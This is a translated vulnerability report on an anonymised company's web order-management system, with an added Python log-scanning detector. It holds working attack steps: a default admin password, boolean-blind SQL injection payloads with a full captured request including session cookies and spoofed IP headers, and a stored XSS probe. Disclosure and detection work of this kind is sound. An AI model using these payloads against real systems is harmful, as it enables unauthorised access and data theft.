Shenzhen xxxxx Co., Ltd. Vulnerability Report
Vulnerabilities found: weak password, SQL injection, stored XSS
1. Weak password
http://xxx.xxx.xxx.xxx:8088/
2. SQL injection
http://xxx.xxx.xxx.xxx:8088/home/main#//Order/Index
3. Stored XSS
http://xxx.xxx.xxx.xxx:8088/home/main#//PrintDevice/Index
Weak password
admin
123456
Login succeeds and lands in the management system
SQL injection
Select Order Management
Test for injection with ' and ''
' and 0='1
' and 1='1
Use boolean-based blind injection
Testing shows the database name length is 16
' and if(length(database())=16,1,0)='1
Testing shows the first character of the database name is d
' and if(mid(database(),1,1)='d',1,0)='1
The rest is brute-forced with Burp Suite (bp)
GET /Order/GetOrderList?page=1&limit=15&addon=&orderInfo=%27+and+if(mid(database()%2C1%2C1)%3D%27d%27%2C1%2C0)%3D%271&orderStatus= HTTP/1.1
Host: xxx.xxx.xxx.xxx:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://xxx.xxx.xxx.xxx:8088/Order/Index
Cookie: .AspNetCore.Session=CfDJ8AQHohFLrupNnfYlr4WRS3YXBsxAsGl9lIouBEENxjbbE3be%2Bu2yfb6cGNwXD4C9v7UDxCcjSv0ZwW5BJbofLoa3cQshDWE8BQpp0KU935V7lWLMeV5jwbumgRNVlX6l5mlDmYZnvQTRJeJmPinEG8GlM33qawzWaCTiPYK1IDv4; .AspNetCore.Cookies=CfDJ8AQHohFLrupNnfYlr4WRS3abqqskD-4pyPjtNH1Mb4BeaN-b0yBzqBcSlNoy51WGYGFzP_6Oi_PTknRJlSxcMCug3Hacljoofu3FcUVF2FV51tk8gc90xmiPMmS979cYM9yGi9dNagIrmRwonC1UxTtKus4YhIY1KcAm0y6JGesJ1BJWI2I1zyqzUiEZo8eH1HQ7oL-2hUHJ0_sa8t_64g94FrlKFbNlGYqO2NFPL0cmR2KYoCvfiZVOjOG72hLwElOlg9GHuV-k0LBsnM3txBhGOkTkpaBpzOr11ISR3MdDo0rmQ31rc7ggrJ2CmNyYCnQXxVAuRgePFdIIemhsG8Pn5VQkJSIAdQQOjTz8eU0qCSoior9Vfl1Jn9o-KcFWexAAIPteKK7z7eWdylDvI4bEVpnT043ulEmjkFH5qKtpz_5PMItz53CjohfbMUPIya4IOzBehSbm2exVbNkGyuOLJ_WYDsk1BgQKjpBDHfYH8tuFuB0E2UpUtmj6fHJNUONUhUjt__gBWKoi2DtRcD0
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Brute-forced parameter: orderInfo
Database name successfully brute-forced: dbprintproject
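A defender-side check for the probing shown in this section, as an added example that is not part of the original report: it scans logged request targets for the boolean-blind indicators seen in the orderInfo payloads above. The log tuples, IP addresses, function names and threshold are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# SQL functions typical of boolean-blind probes, e.g. the report's if()/mid()/length()/database()
SQL_FUNC = re.compile(r"\b(if|mid|substr(?:ing)?|length|database|ascii|sleep)\s*\(", re.I)
# A quote followed directly by a boolean operator, e.g. "' and 1='1"
QUOTE_BOOL = re.compile(r"'\s*(and|or)\b", re.I)

def classify(value):
    """Return the indicators found in one URL-decoded parameter value."""
    hits = []
    if QUOTE_BOOL.search(value):
        hits.append("quote+boolean")
    if SQL_FUNC.search(value):
        hits.append("sql-function")
    return hits

def scan(log, param="orderInfo", threshold=3):
    """Return {source: flagged_count} for sources at or above threshold.

    Assumption: `source` is the TCP peer address recorded by the server,
    not X-Forwarded-For, which the captured request sets to 127.0.0.1.
    """
    flagged = Counter()
    for source, target in log:
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in query.get(param, []):
            if classify(value):
                flagged[source] += 1
    return {source: n for source, n in flagged.items() if n >= threshold}

# Constructed sample log: (source IP, request target). IPs are documentation ranges.
BASE = "/Order/GetOrderList?page=1&limit=15&addon=&orderStatus=&orderInfo="
SAMPLE_LOG = [
    ("203.0.113.7", BASE + "A20230801"),
    ("203.0.113.7", BASE + "O%27Brien"),  # benign value containing a quote
    ("198.51.100.9", BASE + "%27+and+1%3D%271"),
    ("198.51.100.9", BASE + "%27+and+if(length(database())%3D16%2C1%2C0)%3D%271"),
    ("198.51.100.9", BASE + "%27+and+if(mid(database()%2C1%2C1)%3D%27d%27%2C1%2C0)%3D%271"),
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Detection of this kind only shortens response time; the fix for the orderInfo parameter is a parameterized query on the server side.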
Stored XSS
Go to Device Management and add an entry
Test with <script>alert(1)</script>